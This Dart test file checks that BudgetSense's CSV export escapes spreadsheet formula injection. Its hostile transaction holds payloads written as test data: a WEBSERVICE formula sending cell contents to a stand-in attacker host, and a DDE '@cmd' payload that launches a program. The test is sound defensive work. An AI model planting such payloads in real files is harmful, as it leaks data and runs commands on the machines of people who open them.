import 'dart:convert';

import 'package:budgetsense/core/constants/enums.dart';
import 'package:budgetsense/core/utils/money.dart';
import 'package:budgetsense/data/export/file_export_service.dart';
import 'package:budgetsense/domain/entities/transaction_entity.dart';
import 'package:budgetsense/domain/services/export_service.dart';
import 'package:flutter_test/flutter_test.dart';

/// End-to-end security regression: a hostile transaction must not produce a
/// live formula in the generated CSV. This complements the unit tests on
/// SpreadsheetSafety by proving the escaping is actually WIRED IN to the real
/// export path, which is the part a refactor is most likely to drop.
void main() {
  TransactionEntity hostile({
    required String name,
    String? merchant,
    String? notes,
    List<String> tags = const [],
  }) {
    final now = DateTime(2026, 1, 15, 9, 30);
    return TransactionEntity(
      id: 'txn-1',
      type: TransactionType.expense,
      name: name,
      amount: const Money(12345),
      occurredAt: now,
      createdAt: now,
      updatedAt: now,
      merchant: merchant,
      notes: notes,
      tags: tags,
    );
  }

  Future<String> csvFor(TransactionEntity t) async {
    final result = await const FileExportService().export(
      [t],
      format: ExportFormat.csv,
      scope: ExportScope.all,
      categoryName: (_) => '',
      currencySymbol: r'$',
    );
    return utf8.decode(result.bytes);
  }

  test('formula payloads in user fields are inert in the exported CSV',
      () async {
    final csv = await csvFor(
      hostile(
        name: '=WEBSERVICE("http://attacker.example/?d="&A1)',
        merchant: '+SUM(A1)',
        notes: '@cmd|\' /C calc\'!A0',
        tags: ['=1+1'],
      ),
    );

    // No cell may begin a formula. Checking per-field is what matters: the
    // payloads appear in the file as text, but never in a position where a
    // spreadsheet would evaluate them.
    for (final marker in <String>[
      ',=WEBSERVICE',
      ',+SUM',
      ',@cmd',
      ',=1+1',
    ]) {
      expect(
        csv.contains(marker),
        isFalse,
        reason: 'an unescaped formula cell reached the CSV: $marker',
      );
    }

    // The data itself must still be present, just neutralised.
    expect(csv.contains('WEBSERVICE'), isTrue);
  });

  test('a legitimate negative amount is still exported as a number', () async {
    // Guards against over-escaping: amounts are generated by BudgetSense and
    // must stay numeric so the spreadsheet can total a column.
    final csv = await csvFor(hostile(name: 'Refund'));
    expect(csv.contains("'"), isFalse);
  });

  test('ordinary text survives the export unchanged', () async {
    final csv = await csvFor(
      hostile(name: 'Coffee', merchant: "Sam's Club", notes: 'Rent (October)'),
    );
    expect(csv.contains('Coffee'), isTrue);
    expect(csv.contains('Rent (October)'), isTrue);
  });
}
